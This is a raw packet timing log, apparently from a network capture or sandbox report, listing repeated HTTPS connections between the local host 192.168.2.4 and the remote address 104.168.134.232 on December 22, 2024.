                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.941282034 CET44349750104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.941345930 CET44349750104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.941376925 CET49750443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.941381931 CET44349750104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.941502094 CET44349750104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.941540956 CET49750443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.941737890 CET49750443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.941737890 CET49750443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:17.077809095 CET49752443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:17.077925920 CET44349752104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:17.081993103 CET49752443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:17.081994057 CET49752443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:17.082118034 CET44349752104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:18.544116974 CET44349752104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:18.553742886 CET49752443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:18.553803921 CET44349752104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:19.044286013 CET44349752104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:19.044504881 CET44349752104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:19.045178890 CET49752443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:19.045548916 CET49752443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:19.051079988 CET49753443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:19.051126003 CET44349753104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:19.051188946 CET49753443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:19.051414013 CET49753443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:19.051422119 CET44349753104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:20.389552116 CET44349753104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:20.391082048 CET49753443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:20.391104937 CET44349753104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:20.891434908 CET44349753104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:20.891633034 CET44349753104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:20.891695976 CET49753443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:20.892438889 CET49753443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:20.898350000 CET49755443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:20.898380041 CET44349755104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:20.898437023 CET49755443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:20.898660898 CET49755443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:20.898672104 CET44349755104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:22.237835884 CET44349755104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:22.239058971 CET49755443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:22.239079952 CET44349755104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:22.736444950 CET44349755104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:22.736641884 CET44349755104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:22.737207890 CET49755443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:22.737766027 CET49755443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:22.742517948 CET49756443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:22.742567062 CET44349756104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:22.742634058 CET49756443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:22.742837906 CET49756443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:22.742846012 CET44349756104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:24.081625938 CET44349756104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:24.083231926 CET49756443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:24.083262920 CET44349756104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:24.773567915 CET44349756104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:24.773634911 CET44349756104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:24.773679972 CET44349756104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:24.773703098 CET49756443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:24.773726940 CET44349756104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:24.773741961 CET49756443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:24.773778915 CET49756443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:24.828176022 CET44349756104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:24.828207970 CET44349756104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:24.828254938 CET49756443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:24.828264952 CET44349756104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:24.828289032 CET49756443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:24.828304052 CET49756443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:24.976629019 CET44349756104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:24.976670027 CET44349756104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:24.976756096 CET49756443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:24.976767063 CET44349756104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:24.976815939 CET49756443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:25.014858007 CET44349756104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:25.014892101 CET44349756104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:25.015028000 CET49756443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:25.015028000 CET49756443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:25.015036106 CET44349756104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:25.017612934 CET49756443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:25.043080091 CET44349756104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:25.043114901 CET44349756104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:25.043200970 CET44349756104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:25.043205023 CET49756443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:25.043240070 CET49756443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:25.043256998 CET49756443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:25.043564081 CET49756443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:25.063482046 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:25.063513994 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:25.063585997 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:25.063812971 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:25.063839912 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:26.400188923 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:26.403744936 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:26.403799057 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.095917940 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.096008062 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.096054077 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.096070051 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.096097946 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.096111059 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.096111059 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.096138000 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.153466940 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.153537035 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.153585911 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.153601885 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.153618097 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.153639078 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.300360918 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.300426006 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.300436974 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.300460100 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.300481081 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.300502062 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.353800058 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.353873014 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.353897095 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.353909016 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.353930950 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.353938103 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.378361940 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.378437042 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.378462076 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.378477097 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.378499031 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.378519058 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.407701969 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.407767057 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.407809973 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.407818079 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.407840967 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.407855034 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.492613077 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.492681026 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.492731094 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.492746115 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.492782116 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.517399073 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.517462969 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.517599106 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.517599106 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.517606974 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.517656088 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.540098906 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.540173054 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.540288925 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.540288925 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.540297985 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.540388107 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.552934885 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.552999973 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.553026915 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.553034067 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.553061008 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.553086996 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.565319061 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.565376997 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.565404892 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.565412045 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.565440893 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.565460920 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.676985025 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.677057981 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.677097082 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.677108049 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.677135944 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.677154064 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.678725004 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.678913116 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.678971052 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.679195881 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.730647087 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.730707884 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.730921030 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.731005907 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.731021881 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.070816994 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.078130960 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.078213930 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.763750076 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.763818026 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.763861895 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.764031887 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.764031887 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.764097929 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.764168978 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.816184044 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.816279888 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.816278934 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.816306114 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.816335917 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.816365957 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.968240023 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.968303919 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.968359947 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.968413115 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.968446970 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.968467951 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:30.011360884 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:30.011435032 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:30.011590004 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:30.011606932 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:30.011795998 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:30.019705057 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:30.019787073 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:30.019807100 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:30.019927025 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:30.020013094 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:30.020032883 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:30.031104088 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:30.031146049 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:30.031229019 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:30.031418085 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:30.031428099 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:31.370579004 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:31.373361111 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:31.373404026 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.069152117 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.069221973 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.069267035 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.069402933 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.069403887 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.069468975 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.069540977 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.122689962 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.122757912 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.122931004 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.122931957 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.122992992 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.170854092 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.653820038 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.653856039 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.654062033 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.654086113 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.654155016 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.654207945 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.654231071 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.707483053 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.707551956 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.707788944 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.707788944 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.707818985 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.708957911 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.765614986 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.765686989 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.765769005 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.765769005 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.765834093 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.765897989 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.875659943 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.875735044 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.875926018 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.875926971 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.875989914 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.876065016 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.920490980 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.920572042 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.920708895 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.920708895 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.920772076 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.920874119 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.940551996 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.940622091 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.940795898 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.940797091 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.940860987 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.943547010 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.960716963 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.960787058 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.960860014 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.960860968 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.960922956 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:32.960978985 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.005255938 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.005319118 CET44349762104.168.134.232192.168.2.4
